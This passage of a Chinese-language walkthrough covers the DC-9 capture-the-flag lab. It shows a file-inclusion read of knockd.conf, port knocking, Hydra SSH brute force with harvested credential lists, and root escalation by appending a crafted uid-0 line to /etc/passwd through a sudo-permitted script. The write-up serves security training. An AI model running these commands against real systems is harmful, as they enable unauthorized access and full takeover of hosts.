Morrison:/home/janitor2:/bin/bash
所已此页面存在文件包含漏洞
3.2.3 敲门服务
利用前一步发现的文件包含漏洞,看看敲门服务的配置文件。
访问链接:http://192.168.6.145/addrecord.php?file=…/…/…/…/etc/knockd.conf
返回信息:
[options]
UseSyslog [openSSH] sequence = 7469,8475,9842
seq_timeout = 25
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn [closeSSH]
sequence = 9842,8475,7469
seq_timeout = 25
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[openSSH] sequence = 7469,8475,9842
上一行配置信息,说明了开启ssh服务,需要依次开启端口7469,8475,9842,
关闭端口則反过来依次关闭端口9842,8475,7469
3.3 SSH相关
3.3.1 nc开启SSH服务
──(root㉿kali)-[/home/kali]
└─# for i in 7469 8475 9842 22 ;do nc 192.168.6.145 $i;done
(UNKNOWN) [192.168.6.145] 7469 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 8475 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 9842 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 22 (ssh) : Connection refused
如bash信息显示所示。
3.3.2 端口扫描
再次进行端口扫描测试
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-9 192.168.6.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 10:28 EDT
Nmap scan report for 192.168.6.145
Host is up (0.00022s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:C1:5E:37 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.55 seconds
此时发现,22端口已经开启,不再是“22/tcp filtered ssh”。O(∩_∩)O哈哈~
3.3.3 hydra
3.3.3.1 生成字典
利用SQL注入(3.1.3.1)时获得的用户信息,生成字典。
users.txt \ passwd.txt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat users.txt
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2 ┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat passwd.txt
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
3.3.3.2 执行hydra爆破ssh
利用生成的字典进行ssh爆破
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# hydra -L users.txt -P passwd.txt 192.168.6.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 10:50:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.6.145:22/
[22][ssh] host: 192.168.6.145 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.6.145 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.6.145 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 10:51:39
获得一些用户名和密码:
用户名 | 密码 |
---|---|
chandlerb | UrAG0D! |
joeyt | Passw0rd |
janitor | Ilovepeepee |
3.4 ssh连接
3.4.1 chandlerb
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh chandlerb@192.168.6.145
chandlerb@192.168.6.145's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ whoami
chandlerb
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ cd /home
chandlerb@dc-9:/home$ ls
barneyr chandlerb janitor jerrym julied monicag rachelg scoots wilmaf
bettyr fredf janitor2 joeyt marym phoebeb rossg tomc
chandlerb@dc-9:/home$ cd chandlerb/
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$
chandlerb用户没有发现有用信息。
3.4.2 joeyt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh joeyt@192.168.6.145
joeyt@192.168.6.145's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
joeyt@dc-9:~$ ls
joeyt@dc-9:~$ cd /home
joeyt@dc-9:/home$ ls
barneyr bettyr chandlerb fredf janitor janitor2 jerrym joeyt julied marym monicag phoebeb rachelg rossg scoots tomc wilmaf
joeyt@dc-9:/home$
joeyt用户没有发现更多有用信息。
3.4.3 janitor
┌──(root㉿kali)-[/home/kali]
└─# ssh janitor@192.168.6.145
janitor@192.168.6.145's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ ls
janitor@dc-9:~$ ls -al
total 16
drwx------ 4 janitor janitor 4096 Jun 2 00:51 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Jun 2 00:51 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$
janitor@dc-9:~/.secrets-for-putin$ sudo -lWe trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:#1) Respect the privacy of others.#2) Think before you type.#3) With great power comes great responsibility.[sudo] password for janitor:
Sorry, user janitor may not run sudo on dc-9.
如图所示,发现了一些密码,将新发现的密码添加到密码字典中。并且没有可执行sudo的命令。
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# vim passwd.txt ┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat passwd.txt
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
再次使用hydra爆破
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# hydra -L users.txt -P passwd.txt 192.168.6.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 11:48:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://192.168.6.145:22/
[22][ssh] host: 192.168.6.145 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.6.145 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.6.145 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.6.145 login: joeyt password: Passw0rd
[STATUS] 329.00 tries/min, 329 tries in 00:01h, 63 to do in 00:01h, 15 active
[22][ssh] host: 192.168.6.145 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 5 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 11:49:34
获得新用户名和密码:
用户名 | 密码 |
---|---|
fredf | B4-Tru3-001 |
3.4.4 fredf
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh fredf@192.168.6.145
fredf@192.168.6.145's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ ls
fredf@dc-9:~$ ls -al
total 12
drwx------ 3 fredf fredf 4096 Jun 2 01:48 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 fredf fredf 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 fredf fredf 4096 Jun 2 01:48 .gnupg
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser fredf may run the following commands on dc-9:(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$
我们在fredf用户系统里发现了可执行sudo命令的程序:
关键信息:(root) NOPASSWD: /opt/devstuff/dist/test/test
提示不需要密码就可以执行root命令。
查看test.py:
fredf@dc-9:~$ cd /opt/devstuff
fredf@dc-9:/opt/devstuff$ ls -al
total 28
drwxr-xr-x 5 root root 4096 Dec 29 2019 .
drwxr-xr-x 4 root root 4096 Dec 29 2019 ..
drwxr-xr-x 3 root root 4096 Dec 29 2019 build
drwxr-xr-x 3 root root 4096 Dec 29 2019 dist
drwxr-xr-x 2 root root 4096 Dec 29 2019 __pycache__
-rw-r--r-- 1 root root 250 Dec 29 2019 test.py
-rw-r--r-- 1 root root 959 Dec 29 2019 test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/pythonimport sysif len (sys.argv) != 3 :print ("Usage: python test.py read append")sys.exit (1)else :f = open(sys.argv[1], "r")output = (f.read())f = open(sys.argv[2], "a")f.write(output)f.close()
fredf@dc-9:/opt/devstuff$
这是一个写入文件的脚本,生成一个密码用root权限执行脚本写入/etc/passwd文件,所以我们现在就需要构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限,实现提权。
3.5 linux系统提权
3.5.1 kali生成hash密码
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# openssl passwd -1 -salt admin 123456
$1$admin$LClYcRe.ee8dQwgrFc5nz.
生成了加密的密码:
$1$admin$LClYcRe.ee8dQwgrFc5nz.
3.5.2 将密码写入/etc/passwd
依次执行以下命令:
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwdcd /opt/devstuff/dist/test/ls -alsudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff$ echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
fredf@dc-9:/opt/devstuff$ cd /opt/devstuff/dist/test/
fredf@dc-9:/opt/devstuff/dist/test$ ls -al
total 12796
drwxr-xr-x 2 root root 4096 Dec 29 2019 .
drwxr-xr-x 3 root root 4096 Dec 29 2019 ..
-rw-r--r-- 1 root root 779676 Dec 29 2019 base_library.zip
-rwxr-xr-x 1 root root 26136 Apr 3 2019 _bz2.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 153904 Apr 3 2019 _codecs_cn.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 158032 Apr 3 2019 _codecs_hk.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 31024 Apr 3 2019 _codecs_iso2022.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 272688 Apr 3 2019 _codecs_jp.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 141616 Apr 3 2019 _codecs_kr.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 112944 Apr 3 2019 _codecs_tw.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 34008 Apr 3 2019 _hashlib.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 74688 Jul 11 2019 libbz2.so.1.0
-rwxr-xr-x 1 root root 3031904 Oct 13 2019 libcrypto.so.1.1
-rwxr-xr-x 1 root root 243840 Sep 20 2019 libexpat.so.1
-rwxr-xr-x 1 root root 158400 Jan 28 2019 liblzma.so.5
-rwxr-xr-x 1 root root 5080176 Apr 3 2019 libpython3.7m.so.1.0
-rwxr-xr-x 1 root root 309096 May 6 2018 libreadline.so.7
-rwxr-xr-x 1 root root 593696 Oct 13 2019 libssl.so.1.1
-rwxr-xr-x 1 root root 183528 Aug 6 2019 libtinfo.so.6
-rwxr-xr-x 1 root root 121280 Sep 26 2017 libz.so.1
-rwxr-xr-x 1 root root 37688 Apr 3 2019 _lzma.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 64792 Apr 3 2019 _multibytecodec.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 14632 Apr 3 2019 _opcode.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 39944 Apr 3 2019 readline.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 19752 Apr 3 2019 resource.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 116568 Apr 3 2019 _ssl.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 29064 Apr 3 2019 termios.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 1212968 Dec 29 2019 test
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$
成功将passwd写入到/etc/passwd目录
3.5.3 获得flag
3.5.3.1 切换admin用户
用户名:admin
密 码:123456
fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password:
root@dc-9:/opt/devstuff/dist/test#
命令行显示,已获得root权限。
3.5.3.2 查找flag文件
root@dc-9:/opt/devstuff/dist/test# find / -name *flag*
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/sda/hctx0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/var/lib/mysql/debian-10.3.flag
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/ss_flags.ph
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/waitflags.ph
/usr/bin/dpkg-buildflags
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/x86_64-linux-gnu/bits/ss_flags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/nl/man1/dpkg-buildflags.1.gz
/usr/share/man/de/man1/dpkg-buildflags.1.gz
/usr/share/man/man1/dpkg-buildflags.1.gz
/usr/share/man/fr/man1/dpkg-buildflags.1.gz
/usr/share/man/man2/ioctl_iflags.2.gz
/usr/share/dpkg/buildflags.mk
获得falg文件的位置:
/root/theflag.txt
3.5.3.3 查看flag文件
root@dc-9:/opt/devstuff/dist/test# cat /root/theflag.txt███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝Congratulations - you have done well to get to this point.Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.I also want to send out a big thank you to the various members of @m0tl3ycr3w .They are an inspirational bunch of fellows.Sure, they might smell a bit, but...just kidding. :-)Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.So long, and thanks for all the fish.root@dc-9:/opt/devstuff/dist/test#
至此,dc-9渗透测试结束,获得最终flag。O(∩_∩)O哈哈~ 全文40627字,呜呼
渗透总结
在DC-9靶场渗透测试中,内容包括nmap扫描、目录扫描(nikto\dirsearch\dirb)、SQ注入、wfuzz爆破、LFI文件包含、SSH爆破(knockd\nmap\netcat\Hydra)、linux内核提权(openssl)并获得flag等内容。思路如下:
- 使用nmap进行主机发现和端口扫描
- 目录扫描(nikto\dirsearch\dirb)
- LFI文件包含漏洞
- 使用sqlmp进行sql注入获得用户信息
- 使用hydra进行密码爆破
- SSH爆破(knockd\nmap\netcat\Hydra)
- linux内核提权,并获得flag
参考文章
- DC-9环境
- arp-scan使用
- nmap详细使用教程
- 黑客工具之whatweb详细使用教程
- sqlmap使用
- hydra工具的使用 (暴力破解密码)及kali自带字典说明
- 通过Knockd隐藏SSH,让黑客看不见你的服务器
- dc-9渗透测试流程图